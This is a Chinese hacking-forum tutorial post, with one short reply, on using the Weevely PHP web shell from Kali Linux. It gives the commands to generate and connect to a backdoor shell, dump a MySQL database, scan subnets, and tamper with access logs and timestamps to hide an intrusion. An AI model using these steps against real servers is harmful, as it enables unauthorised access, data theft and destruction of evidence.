搜索
查看: 1669|回复: 1

Kali Weevely使用学习

  [复制链接]

666

主题

966

帖子

2462

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2462

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2021-7-5 11:10:59 | 显示全部楼层 |阅读模式

Weevely 是一个专门为 Web 渗透测试设计的 Web shell,由于是用 python 语言编写的工具,因此支持跨平台可以 任何有 python 环境的系统上使用。和 Windows 系统中一款类似的工具(中国菜刀)一样。

weevely.png

安装更新

在 kali 中已经默认安装了 weevely 其他类似系统安装执行下面命令即可。

apt-get install weevely -y

基础用法

生成 Web shell

格式如下: weevely generate 示例:

weevely generate 8888 /root/88.php

生成 web shell

连接 Web shell

我们需将生成的 Web shell 上传到目标服务器。这里不在详解,需要的伙伴可以阅读博客中类似的文章。 格式如下: weevely [cmd] 示例:

weevely http://192.168.1.2/88.php 8888

连接 shell

查看系统信息

所需命令 system_info 查看系统信息

枚举用户文件

枚举用户目录下且有权限的文件,也可用来加载字典。这里我们可以通过 :audit_ filesystem,来查看都支 持搜索哪些类型的用户文件。

查看 PHP 配置文件

所需命令 audit_phpconf

高级用法

系统提权

连接数据库 sql_console

sql_console -u root -p 12345678

连接数据库

对数据库进行脱裤

所需命令:sql_dump

sql_dump -dbms mysql tianyuan root 12345678 

文件操作

当获取到目标系统的 weevely shell 后,我们通过 help 可以查看文件相关的模块。通过这些文件操作模块,可以 对目标服务器进行文件的打包、上传、 获取、删除、在线修改、复制,还可以通过 HTTPfs 挂在远程文件系统。通 过这些操作,不仅可以修改目标服务器上的源代码,还可以清除或修改我们的操作日志。比如将 access log 中有关 测试机 IP 地址的信息删除,或者算改日志中的时间戳等等。

子网扫描

所需命令:net_scan 示例:

net_scan 192.168.1.1/24 80,3306 -print

更多好玩,请看 help 命令。

有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

150

主题

245

帖子

532

积分

高级会员

中国黑客

Rank: 4

积分
532
QQ
发表于 2021-7-6 14:47:24 来自手机 | 显示全部楼层
kali下的中国菜刀!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表